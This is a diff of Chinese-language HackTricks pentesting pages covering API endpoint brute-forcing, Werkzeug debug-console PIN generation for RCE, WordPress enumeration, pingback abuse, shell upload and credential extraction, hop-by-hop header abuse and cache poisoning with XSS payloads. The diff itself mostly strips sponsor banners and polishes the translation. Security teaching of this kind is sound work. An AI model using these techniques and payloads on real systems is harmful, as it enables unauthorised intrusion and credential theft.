+- [**kiterunner**](https://github.com/assetnote/kiterunner): 非常适合发现 API 端点。使用它扫描和暴力破解目标 API 的路径和参数。
 ```bash
 kr scan https://domain.com/api/ -w routes-large.kite -x 20
 kr scan https://domain.com/api/ -A=apiroutes-220828 -x 20
@@ -50,20 +43,13 @@ kr brute https://domain.com/api/ -w /tmp/lang-english.txt -x 20 -d=0
 
 ### **学习和实践资源**
 
-- **OWASP API 安全前 10**:理解常见 API 漏洞的必读材料 ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf))。
-- **API 安全检查清单**:一个全面的 API 安全检查清单 ([GitHub link](https://github.com/shieldfy/API-Security-Checklist))。
-- **Logger++ 过滤器**:用于寻找 API 漏洞,Logger++ 提供有用的过滤器 ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters))。
-- **API 端点列表**:一个经过策划的潜在 API 端点列表,用于测试目的 ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d))。
+- **OWASP API Security Top 10**: 理解常见 API 漏洞的必读材料 ([OWASP Top 10](https://github.com/OWASP/API-Security/blob/master/2019/en/dist/owasp-api-security-top-10.pdf))。
+- **API 安全检查清单**: 一个全面的 API 安全检查清单 ([GitHub link](https://github.com/shieldfy/API-Security-Checklist))。
+- **Logger++ 过滤器**: 用于寻找 API 漏洞,Logger++ 提供有用的过滤器 ([GitHub link](https://github.com/bnematzadeh/LoggerPlusPlus-API-Filters))。
+- **API 端点列表**: 一个为测试目的整理的潜在 API 端点列表 ([GitHub gist](https://gist.github.com/yassineaboukir/8e12adefbd505ef704674ad6ad48743d))。
 
 ## 参考文献
 
 - [https://github.com/Cyber-Guy1/API-SecurityEmpire](https://github.com/Cyber-Guy1/API-SecurityEmpire)
 
-

-
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=web-api-pentesting) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-今天就获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=web-api-pentesting" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/werkzeug.md b/src/network-services-pentesting/pentesting-web/werkzeug.md
index ee830849a..3c8fd7aec 100644
--- a/src/network-services-pentesting/pentesting-web/werkzeug.md
+++ b/src/network-services-pentesting/pentesting-web/werkzeug.md
@@ -2,13 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-**从黑客的角度看待您的网络应用、网络和云**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 ## 控制台 RCE
 
@@ -18,13 +11,13 @@ __import__('os').popen('whoami').read();
 ```
 ![](<../../images/image (117).png>)
 
-互联网上还有几个漏洞,比如[这个](https://github.com/its-arun/Werkzeug-Debug-RCE)或Metasploit中的一个。
+互联网上还有几个漏洞,比如[这个](https://github.com/its-arun/Werkzeug-Debug-RCE)或metasploit中的一个。
 
-## Pin 保护 - 路径遍历
+## PIN保护 - 路径遍历
 
-在某些情况下,**`/console`** 端点将受到 pin 的保护。如果您有 **文件遍历漏洞**,您可以泄露生成该 pin 所需的所有信息。
+在某些情况下,**`/console`** 端点将受到PIN保护。如果您有**文件遍历漏洞**,您可以泄露生成该PIN所需的所有信息。
 
-### Werkzeug 控制台 PIN 漏洞
+### Werkzeug控制台PIN漏洞
 
 在应用程序中强制显示调试错误页面以查看此内容:
 ```
@@ -38,17 +31,17 @@ shell that runs the server
 
 #### **`probably_public_bits`**
 
-- **`username`**: 指发起 Flask 会话的用户。
-- **`modname`**: 通常指定为 `flask.app`。
-- **`getattr(app, '__name__', getattr(app.__class__, '__name__'))`**: 通常解析为 **Flask**。
-- **`getattr(mod, '__file__', None)`**: 表示 Flask 目录中 `app.py` 的完整路径(例如,`/usr/local/lib/python3.5/dist-packages/flask/app.py`)。如果 `app.py` 不适用,**尝试 `app.pyc`**。
+- **`username`**:指发起 Flask 会话的用户。
+- **`modname`**:通常指定为 `flask.app`。
+- **`getattr(app, '__name__', getattr(app.__class__, '__name__'))`**:通常解析为 **Flask**。
+- **`getattr(mod, '__file__', None)`**:表示 Flask 目录中 `app.py` 的完整路径(例如,`/usr/local/lib/python3.5/dist-packages/flask/app.py`)。如果 `app.py` 不适用,**尝试 `app.pyc`**。
 
 #### **`private_bits`**
 
-- **`uuid.getnode()`**: 获取当前机器的 MAC 地址,`str(uuid.getnode())` 将其转换为十进制格式。
+- **`uuid.getnode()`**:获取当前机器的 MAC 地址,`str(uuid.getnode())` 将其转换为十进制格式。
 
-- 要 **确定服务器的 MAC 地址**,必须识别应用使用的活动网络接口(例如,`ens3`)。如果不确定,**泄露 `/proc/net/arp`** 以找到设备 ID,然后 **从 `/sys/class/net//address` 提取 MAC 地址**。
-- 将十六进制 MAC 地址转换为十进制可以如下进行:
+- 要 **确定服务器的 MAC 地址**,必须识别应用使用的活动网络接口(例如,`ens3`)。如果不确定,**泄露 `/proc/net/arp`** 以找到设备 ID,然后 **从 `/sys/class/net//address`** 中提取 MAC 地址。
+- 可以按如下方式将十六进制 MAC 地址转换为十进制:
 
 ```python
 # 示例 MAC 地址: 56:00:02:7a:23:ac
@@ -56,7 +49,7 @@ shell that runs the server
 94558041547692
 ```
 
-- **`get_machine_id()`**: 将 `/etc/machine-id` 或 `/proc/sys/kernel/random/boot_id` 中的数据与 `/proc/self/cgroup` 的第一行在最后一个斜杠(`/`)之后的部分连接起来。
+- **`get_machine_id()`**:将 `/etc/machine-id` 或 `/proc/sys/kernel/random/boot_id` 中的数据与 `/proc/self/cgroup` 的第一行在最后一个斜杠(`/`)之后的部分连接起来。
 
 

 
@@ -102,7 +95,7 @@ try:
 
 在收集所有必要数据后,可以执行漏洞利用脚本以生成 Werkzeug 控制台 PIN:
 
-在收集所有必要数据后,可以执行漏洞利用脚本以生成 Werkzeug 控制台 PIN。该脚本使用组装的 `probably_public_bits` 和 `private_bits` 创建哈希,然后经过进一步处理以生成最终 PIN。以下是执行此过程的 Python 代码:
+在收集所有必要数据后,可以执行漏洞利用脚本以生成 Werkzeug 控制台 PIN。该脚本使用组装的 `probably_public_bits` 和 `private_bits` 创建一个哈希,然后经过进一步处理以生成最终的 PIN。以下是执行此过程的 Python 代码:
 ```python
 import hashlib
 from itertools import chain
@@ -148,14 +141,14 @@ rv = num
 
 print(rv)
 ```
-这个脚本通过对连接的位进行哈希,添加特定的盐(`cookiesalt` 和 `pinsalt`),并格式化输出,生成 PIN。需要注意的是,`probably_public_bits` 和 `private_bits` 的实际值需要从目标系统准确获取,以确保生成的 PIN 与 Werkzeug 控制台预期的匹配。
+该脚本通过对连接的位进行哈希处理,添加特定的盐(`cookiesalt` 和 `pinsalt`),并格式化输出,从而生成 PIN。需要注意的是,`probably_public_bits` 和 `private_bits` 的实际值需要从目标系统准确获取,以确保生成的 PIN 与 Werkzeug 控制台预期的匹配。
 
 > [!TIP]
 > 如果您使用的是 **旧版本** 的 Werkzeug,请尝试将 **哈希算法更改为 md5** 而不是 sha1。
 
 ## Werkzeug Unicode 字符
 
-正如在 [**这个问题**](https://github.com/pallets/werkzeug/issues/2833) 中观察到的,Werkzeug 不会关闭带有 Unicode 字符的请求头。而正如在 [**这个写作**](https://mizu.re/post/twisty-python) 中解释的,这可能导致 CL.0 请求走私漏洞。
+正如在 [**这个问题**](https://github.com/pallets/werkzeug/issues/2833) 中观察到的,Werkzeug 不会关闭带有 Unicode 字符的请求头。而正如在 [**这篇文章**](https://mizu.re/post/twisty-python) 中解释的,这可能导致 CL.0 请求走私漏洞。
 
 这是因为,在 Werkzeug 中可以发送一些 **Unicode** 字符,这会导致服务器 **崩溃**。然而,如果 HTTP 连接是通过 **`Connection: keep-alive`** 头创建的,请求的主体将不会被读取,连接仍将保持打开状态,因此请求的 **主体** 将被视为 **下一个 HTTP 请求**。
 
@@ -170,12 +163,4 @@ print(rv)
 - [**https://github.com/pallets/werkzeug/issues/2833**](https://github.com/pallets/werkzeug/issues/2833)
 - [**https://mizu.re/post/twisty-python**](https://mizu.re/post/twisty-python)
 
-

-
-**获取黑客对您的网络应用、网络和云的看法**
-
-**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们 20 多个自定义工具来映射攻击面,发现让您提升权限的安全问题,并使用自动化利用收集重要证据,将您的辛勤工作转化为有说服力的报告。
-
-{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/network-services-pentesting/pentesting-web/wordpress.md b/src/network-services-pentesting/pentesting-web/wordpress.md
index b426db1ee..fcc3f103e 100644
--- a/src/network-services-pentesting/pentesting-web/wordpress.md
+++ b/src/network-services-pentesting/pentesting-web/wordpress.md
@@ -2,51 +2,43 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
-
 ## 基本信息
 
-- **上传的** 文件位于: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
-- **主题文件可以在 /wp-content/themes/ 中找到,** 所以如果你更改主题的一些 php 文件以获取 RCE,你可能会使用该路径。例如:使用 **theme twentytwelve** 你可以 **访问** **404.php** 文件: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+- **上传**的文件位于: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`
+- **主题文件可以在 /wp-content/themes/ 中找到,** 所以如果你修改主题的一些 php 文件以获取 RCE,你可能会使用该路径。例如: 使用 **theme twentytwelve** 你可以 **访问** **404.php** 文件在: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
-- **另一个有用的 URL 可能是:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
+- **另一个有用的 URL 可能是:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
 
-- 在 **wp-config.php** 中可以找到数据库的根密码。
-- 默认登录路径检查: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
+- 在 **wp-config.php** 中你可以找到数据库的根密码。
+- 默认登录路径检查: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
 
 ### **主要 WordPress 文件**
 
 - `index.php`
 - `license.txt` 包含有用的信息,例如安装的 WordPress 版本。
 - `wp-activate.php` 用于设置新 WordPress 网站时的电子邮件激活过程。
-- 登录文件夹(可能被重命名以隐藏):
+- 登录文件夹(可能被重命名以隐藏):
 - `/wp-admin/login.php`
 - `/wp-admin/wp-login.php`
 - `/login.php`
 - `/wp-login.php`
-- `xmlrpc.php` 是一个文件,代表 WordPress 的一个功能,允许数据通过 HTTP 作为传输机制,XML 作为编码机制进行传输。这种类型的通信已被 WordPress [REST API](https://developer.wordpress.org/rest-api/reference) 取代。
+- `xmlrpc.php` 是一个代表 WordPress 功能的文件,允许数据通过 HTTP 作为传输机制,XML 作为编码机制进行传输。这种类型的通信已被 WordPress [REST API](https://developer.wordpress.org/rest-api/reference) 替代。
 - `wp-content` 文件夹是存储插件和主题的主要目录。
 - `wp-content/uploads/` 是存储上传到平台的任何文件的目录。
 - `wp-includes/` 这是存储核心文件的目录,例如证书、字体、JavaScript 文件和小部件。
-- `wp-sitemap.xml` 在 WordPress 版本 5.5 及更高版本中,WordPress 生成一个包含所有公共帖子和可公开查询的帖子类型和分类法的站点地图 XML 文件。
+- `wp-sitemap.xml` 在 WordPress 版本 5.5 及更高版本中,WordPress 生成一个包含所有公共帖子和可公开查询的帖子类型及分类法的站点地图 XML 文件。
 
 **后期利用**
 
-- `wp-config.php` 文件包含 WordPress 连接数据库所需的信息,例如数据库名称、数据库主机、用户名和密码、身份验证密钥和盐,以及数据库表前缀。此配置文件还可以用于激活 DEBUG 模式,这在故障排除时非常有用。
+- `wp-config.php` 文件包含 WordPress 连接数据库所需的信息,例如数据库名称、数据库主机、用户名和密码、身份验证密钥和盐,以及数据库表前缀。该配置文件还可以用于激活 DEBUG 模式,这在故障排除时可能很有用。
 
 ### 用户权限
 
 - **管理员**
-- **编辑者**:发布和管理他和其他人的帖子
-- **作者**:发布和管理自己的帖子
-- **贡献者**:撰写和管理自己的帖子,但不能发布
-- **订阅者**:浏览帖子并编辑他们的个人资料
+- **编辑**: 发布和管理他和其他人的帖子
+- **作者**: 发布和管理自己的帖子
+- **贡献者**: 撰写和管理自己的帖子但不能发布
+- **订阅者**: 浏览帖子并编辑他们的个人资料
 
 ## **被动枚举**
 
@@ -54,7 +46,7 @@
 
 检查是否可以找到文件 `/license.txt` 或 `/readme.html`
 
-在页面的 **源代码** 中(来自 [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/) 的示例):
+在页面的 **源代码** 中(来自 [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/) 的示例):
 
 - grep
 ```bash
@@ -85,29 +77,21 @@ curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-conten
 curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
 
 ```
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
-
 ## 主动枚举
 
 ### 插件和主题
 
-您可能无法找到所有可能的插件和主题。为了发现所有这些,您需要 **主动暴力破解插件和主题的列表**(希望对我们来说,有自动化工具包含这些列表)。
+您可能无法找到所有可能的插件和主题。为了发现它们,您需要**主动暴力破解插件和主题的列表**(希望对我们来说,有自动化工具包含这些列表)。
 
 ### 用户
 
-- **ID暴力破解:** 通过暴力破解用户ID从WordPress网站获取有效用户:
+- **ID 暴力破解:** 您可以通过暴力破解用户 ID 从 WordPress 网站获取有效用户:
 ```bash
 curl -s -I -X GET http://blog.example.com/?author=1
 ```
-如果响应是 **200** 或 **30X**,这意味着 id 是 **有效** 的。如果响应是 **400**,那么 id 是 **无效** 的。
+如果响应是 **200** 或 **30X**,这意味着 id 是 **有效** 的。如果响应是 **400**,则 id 是 **无效** 的。
 
-- **wp-json:** 你也可以通过查询来获取用户的信息:
+- **wp-json:** 您还可以尝试通过查询获取有关用户的信息:
 ```bash
 curl http://blog.example.com/wp-json/wp/v2/users
 ```
@@ -115,7 +99,7 @@ curl http://blog.example.com/wp-json/wp/v2/users
 ```bash
 curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
 ```
-注意,此端点仅暴露已发布帖子的用户。**仅提供启用此功能的用户的信息**。
+注意,此端点仅公开已发布帖子的用户。**仅提供启用此功能的用户的信息**。
 
 还要注意,**/wp-json/wp/v2/pages** 可能会泄露 IP 地址。
 
@@ -195,7 +179,7 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
 **DDoS或端口扫描**
 
 如果您可以在列表中找到方法_**pingback.ping**_,则可以使Wordpress向任何主机/端口发送任意请求。\
-这可以用来请求**成千上万**的Wordpress**站点**去**访问**一个**位置**(因此在该位置会造成**DDoS**),或者您可以用它让**Wordpress**去**扫描**一些内部**网络**(您可以指定任何端口)。
+这可以用来请求**成千上万**的Wordpress **站点** **访问**一个**位置**(因此在该位置造成**DDoS**),或者您可以用它让**Wordpress** **扫描**一些内部**网络**(您可以指定任何端口)。
 ```markup
 
 pingback.ping
@@ -299,7 +283,7 @@ use exploit/unix/webapp/wp_admin_shell_upload
 
 ![](<../../images/image (70).png>)
 
-这可能看起来没有任何反应,但如果您转到媒体,您将看到您的 shell 已上传:
+可能这看起来不会做任何事情,但如果您去媒体,您会看到您的 shell 已上传:
 
 ![](<../../images/image (462).png>)
 
@@ -334,7 +318,7 @@ use exploit/unix/webapp/wp_admin_shell_upload
 - _**(RCE) 内置主题编辑:**_ 编辑 WordPress 中的内置主题。
 - _**(自定义) 自定义利用:**_ 针对第三方 WordPress 插件/主题的自定义利用。
 
-## 后期利用
+## 后利用
 
 提取用户名和密码:
 ```bash
@@ -366,7 +350,7 @@ add_action( 'wp_ajax_nopriv_action_name', array(&$this, 'function_name'));
 
 - **REST API**
 
-还可以通过使用 `register_rest_route` 函数从 WordPress 暴露函数。
+还可以通过使用 `register_rest_route` 函数从 WordPress 暴露函数:
 ```php
 register_rest_route(
 $this->namespace, '/get/', array(
@@ -410,12 +394,4 @@ add_filter( 'auto_update_theme', '__return_true' );
 - **限制登录尝试** 以防止暴力攻击
 - 重命名 **`wp-admin.php`** 文件,并仅允许内部或特定 IP 地址访问。
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
-
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/abusing-hop-by-hop-headers.md b/src/pentesting-web/abusing-hop-by-hop-headers.md
index 2fb5d1b23..3ae5c5a10 100644
--- a/src/pentesting-web/abusing-hop-by-hop-headers.md
+++ b/src/pentesting-web/abusing-hop-by-hop-headers.md
@@ -2,53 +2,41 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流点。
-
-{% embed url="https://www.rootedcon.com/" %}
-
 ---
 
 **这是文章的摘要** [**https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers**](https://nathandavison.com/blog/abusing-http-hop-by-hop-request-headers)
 
 Hop-by-hop headers 是特定于单个传输级连接的,主要用于 HTTP/1.1 中管理两个节点(如客户端-代理或代理-代理)之间的数据,并不打算被转发。标准的 hop-by-hop headers 包括 `Keep-Alive`、`Transfer-Encoding`、`TE`、`Connection`、`Trailer`、`Upgrade`、`Proxy-Authorization` 和 `Proxy-Authenticate`,如 [RFC 2616](https://tools.ietf.org/html/rfc2616#section-13.5.1) 中所定义。可以通过 `Connection` header 将其他 headers 指定为 hop-by-hop。
 
-### Abusing Hop-by-Hop Headers
+### 滥用 Hop-by-Hop Headers
 
 代理对 hop-by-hop headers 的不当管理可能导致安全问题。虽然代理应该删除这些 headers,但并非所有代理都这样做,从而产生潜在的漏洞。
 
-### Testing for Hop-by-Hop Header Handling
+### 测试 Hop-by-Hop Header 处理
 
 可以通过观察在特定 headers 被标记为 hop-by-hop 时服务器响应的变化来测试 hop-by-hop headers 的处理。工具和脚本可以自动化此过程,识别代理如何管理这些 headers,并可能揭示配置错误或代理行为。
 
 滥用 hop-by-hop headers 可能导致各种安全隐患。以下是几个示例,演示如何操纵这些 headers 进行潜在攻击:
 
-### Bypassing Security Controls with `X-Forwarded-For`
+### 通过 `X-Forwarded-For` 绕过安全控制
 
-攻击者可以操纵 `X-Forwarded-For` header 以绕过基于 IP 的访问控制。该 header 通常由代理用于跟踪客户端的源 IP 地址。然而,如果代理将此 header 视为 hop-by-hop 并在没有适当验证的情况下转发,攻击者可以伪造其 IP 地址。
+攻击者可以操纵 `X-Forwarded-For` header 以绕过基于 IP 的访问控制。此 header 通常由代理用于跟踪客户端的源 IP 地址。然而,如果代理将此 header 视为 hop-by-hop 并在没有适当验证的情况下转发,攻击者可以伪造其 IP 地址。
 
 **攻击场景:**
 
 1. 攻击者向位于代理后面的 web 应用程序发送 HTTP 请求,在 `X-Forwarded-For` header 中包含一个虚假的 IP 地址。
 2. 攻击者还包括 `Connection: close, X-Forwarded-For` header,促使代理将 `X-Forwarded-For` 视为 hop-by-hop。
 3. 配置错误的代理将请求转发到 web 应用程序,而没有伪造的 `X-Forwarded-For` header。
-4. web 应用程序未看到原始的 `X-Forwarded-For` header,可能会将请求视为直接来自受信任的代理,从而可能允许未经授权的访问。
+4. web 应用程序没有看到原始的 `X-Forwarded-For` header,可能会将请求视为直接来自受信任的代理,从而可能允许未经授权的访问。
 
-### Cache Poisoning via Hop-by-Hop Header Injection
+### 通过 Hop-by-Hop Header 注入进行缓存中毒
 
-如果缓存服务器错误地根据 hop-by-hop headers 缓存内容,攻击者可能会注入恶意 headers 来毒化缓存。这将向请求相同资源的用户提供不正确或恶意的内容。
+如果缓存服务器错误地根据 hop-by-hop headers 缓存内容,攻击者可以注入恶意 headers 来毒化缓存。这将向请求相同资源的用户提供不正确或恶意的内容。
 
 **攻击场景:**
 
 1. 攻击者向 web 应用程序发送请求,包含一个不应被缓存的 hop-by-hop header(例如,`Connection: close, Cookie`)。
-2. 配置不当的缓存服务器未删除 hop-by-hop header,并缓存了特定于攻击者会话的响应。
+2. 配置不当的缓存服务器未能删除 hop-by-hop header,并缓存了特定于攻击者会话的响应。
 3. 未来请求相同资源的用户收到缓存的响应,该响应是为攻击者量身定制的,可能导致会话劫持或敏感信息泄露。
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) 是 **西班牙** 最相关的网络安全事件,也是 **欧洲** 最重要的事件之一。该大会 **旨在促进技术知识**,是各个学科技术和网络安全专业人士的热烈交流点。
-
-{% embed url="https://www.rootedcon.com/" %}
-
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/cache-deception/README.md b/src/pentesting-web/cache-deception/README.md
index aaad6dec8..2f768ca6f 100644
--- a/src/pentesting-web/cache-deception/README.md
+++ b/src/pentesting-web/cache-deception/README.md
@@ -2,38 +2,30 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

-
-\
-使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=cache-deception) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
-立即获取访问权限:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=cache-deception" %}
-
 ## 区别
 
 > **Web缓存中毒和Web缓存欺骗之间有什么区别?**
 >
-> - 在 **Web缓存中毒** 中,攻击者使应用程序在缓存中存储一些恶意内容,并且这些内容从缓存中提供给其他应用程序用户。
-> - 在 **Web缓存欺骗** 中,攻击者使应用程序在缓存中存储属于另一个用户的一些敏感内容,然后攻击者从缓存中检索这些内容。
+> - 在**Web缓存中毒**中,攻击者使应用程序在缓存中存储一些恶意内容,并且这些内容会从缓存中提供给其他应用程序用户。
+> - 在**Web缓存欺骗**中,攻击者使应用程序在缓存中存储属于另一个用户的一些敏感内容,然后攻击者从缓存中检索这些内容。
 
 ## 缓存中毒
 
-缓存中毒旨在操纵客户端缓存,强迫客户端加载意外、部分或在攻击者控制下的资源。影响的程度取决于受影响页面的受欢迎程度,因为被污染的响应仅在缓存污染期间提供给访问该页面的用户。
+缓存中毒旨在操纵客户端缓存,强迫客户端加载意外、部分或由攻击者控制的资源。影响的程度取决于受影响页面的受欢迎程度,因为被污染的响应仅在缓存污染期间提供给访问该页面的用户。
 
 执行缓存中毒攻击涉及几个步骤:
 
-1. **识别未键入的输入**:这些是参数,尽管不是缓存请求所必需的,但可以改变服务器返回的响应。识别这些输入至关重要,因为它们可以被利用来操纵缓存。
-2. **利用未键入的输入**:在识别未键入的输入后,下一步是弄清楚如何滥用这些参数,以修改服务器的响应,从而使攻击者受益。
+1. **识别无键输入**:这些是参数,尽管不是请求被缓存所必需的,但可以改变服务器返回的响应。识别这些输入至关重要,因为它们可以被利用来操纵缓存。
+2. **利用无键输入**:在识别无键输入后,下一步是弄清楚如何滥用这些参数,以一种对攻击者有利的方式修改服务器的响应。
 3. **确保被污染的响应被缓存**:最后一步是确保被操纵的响应被存储在缓存中。这样,任何在缓存被污染时访问受影响页面的用户将收到被污染的响应。
 
 ### 发现:检查HTTP头
 
-通常,当响应被 **存储在缓存中** 时,会有一个 **指示的头**,您可以在此帖子中检查您应该关注哪些头:[**HTTP缓存头**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers)。
+通常,当响应被**存储在缓存中**时,会有一个**指示的头**,您可以在这篇文章中检查您应该关注哪些头:[**HTTP缓存头**](../../network-services-pentesting/pentesting-web/special-http-headers.md#cache-headers)。
 
 ### 发现:缓存错误代码
 
-如果您认为响应正在被存储在缓存中,您可以尝试 **发送带有错误头的请求**,这应该会以 **状态代码400** 响应。然后尝试正常访问请求,如果 **响应是400状态代码**,您就知道它是脆弱的(您甚至可以执行DoS)。
+如果您认为响应正在被存储在缓存中,您可以尝试**发送带有错误头的请求**,这应该会以**状态代码400**响应。然后尝试正常访问请求,如果**响应是400状态代码**,您就知道它是脆弱的(您甚至可以执行DoS)。
 
 您可以在以下位置找到更多选项:
 
@@ -41,21 +33,21 @@
 cache-poisoning-to-dos.md
 {{#endref}}
 
-但是,请注意 **有时这些状态代码不会被缓存**,因此此测试可能不可靠。
+但是,请注意,**有时这些状态代码不会被缓存**,因此此测试可能不可靠。
 
-### 发现:识别和评估未键入的输入
+### 发现:识别和评估无键输入
 
-您可以使用 [**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943) 来 **暴力破解参数和头**,这些可能会 **改变页面的响应**。例如,一个页面可能使用头 `X-Forwarded-For` 来指示客户端从那里加载脚本:
+您可以使用[**Param Miner**](https://portswigger.net/bappstore/17d2949a985c4b7ca092728dba871943)来**暴力破解可能**改变页面响应的**参数和头**。例如,一个页面可能使用头`X-Forwarded-For`来指示客户端从那里加载脚本:
 ```markup
 
 ```
-### 引发后端服务器的有害响应
+### 从后端服务器引发有害响应
 
-在识别出参数/头部后,检查它是如何被**清理**的,以及它**在哪里**被**反映**或影响响应。你能以任何方式滥用它吗(执行XSS或加载你控制的JS代码?执行DoS?...)
+通过识别的参数/头部检查它是如何被**清理**的,以及它**在哪里**被**反映**或影响响应。你能以任何方式滥用它吗(执行XSS或加载你控制的JS代码?执行DoS?...)
 
-### 获取响应缓存
+### 获取缓存的响应
 
-一旦你**识别**出可以被滥用的**页面**,使用哪个**参数**/**头部**以及**如何**滥用它,你需要将页面缓存。根据你尝试缓存的资源,这可能需要一些时间,你可能需要尝试几秒钟。
+一旦你**识别**了可以被滥用的**页面**,使用哪个**参数**/**头部**以及**如何**滥用它,你需要让页面被缓存。根据你尝试缓存的资源,这可能需要一些时间,你可能需要尝试几秒钟。
 
 响应中的头部**`X-Cache`**可能非常有用,因为当请求未被缓存时,它的值可能是**`miss`**,而当它被缓存时,值为**`hit`**。\
 头部**`Cache-Control`**也很有趣,可以知道资源是否被缓存,以及下次资源将何时再次被缓存:`Cache-Control: public, max-age=1800`
@@ -77,9 +69,9 @@ GET /en?region=uk HTTP/1.1
 Host: innocent-website.com
 X-Forwarded-Host: a.">"
 ```
-_注意,这将使请求变得无效到 `/en?region=uk` 而不是 `/en`_
+_注意,这将使对 `/en?region=uk` 的请求中毒,而不是 `/en`_
 
-### 缓存中毒导致拒绝服务
+### 缓存中毒以进行 DoS
 
 {{#ref}}
 cache-poisoning-to-dos.md
@@ -93,7 +85,7 @@ GET / HTTP/1.1
 Host: vulnerable.com
 Cookie: session=VftzO7ZtiBj5zNLRAuFpXpSQLjS4lBmU; fehost=asd"%2balert(1)%2b"
 ```
-注意,如果易受攻击的 cookie 被用户频繁使用,常规请求将清除缓存。
+注意,如果易受攻击的 cookie 被用户广泛使用,常规请求将清除缓存。
 
 ### 使用分隔符、规范化和点生成差异 
 
@@ -115,7 +107,7 @@ cache-poisoning-via-url-discrepancies.md
 
 ### 使用多个头部利用 web 缓存污染漏洞 
 
-有时您需要 **利用多个未键入的输入** 来滥用缓存。例如,如果您将 `X-Forwarded-Host` 设置为您控制的域名,并将 `X-Forwarded-Scheme` 设置为 `http`,您可能会发现一个 **开放重定向**。**如果** 服务器 **将** 所有 **HTTP** 请求 **转发** 到 **HTTPS** 并使用头部 `X-Forwarded-Scheme` 作为重定向的域名。您可以控制重定向指向的页面。
+有时您需要 **利用多个无键输入** 来滥用缓存。例如,如果您将 `X-Forwarded-Host` 设置为您控制的域名,并将 `X-Forwarded-Scheme` 设置为 `http`,您可能会发现一个 **开放重定向**。**如果** 服务器 **将** 所有 **HTTP** 请求 **转发** 到 **HTTPS** 并使用头部 `X-Forwarded-Scheme` 作为重定向的域名。您可以控制重定向指向的页面。
 ```markup
 GET /resources/js/tracking.js HTTP/1.1
 Host: acc11fe01f16f89c80556c2b0056002e.web-security-academy.net
@@ -142,57 +134,57 @@ Content-Length: 22
 
 report=innocent-victim
 ```
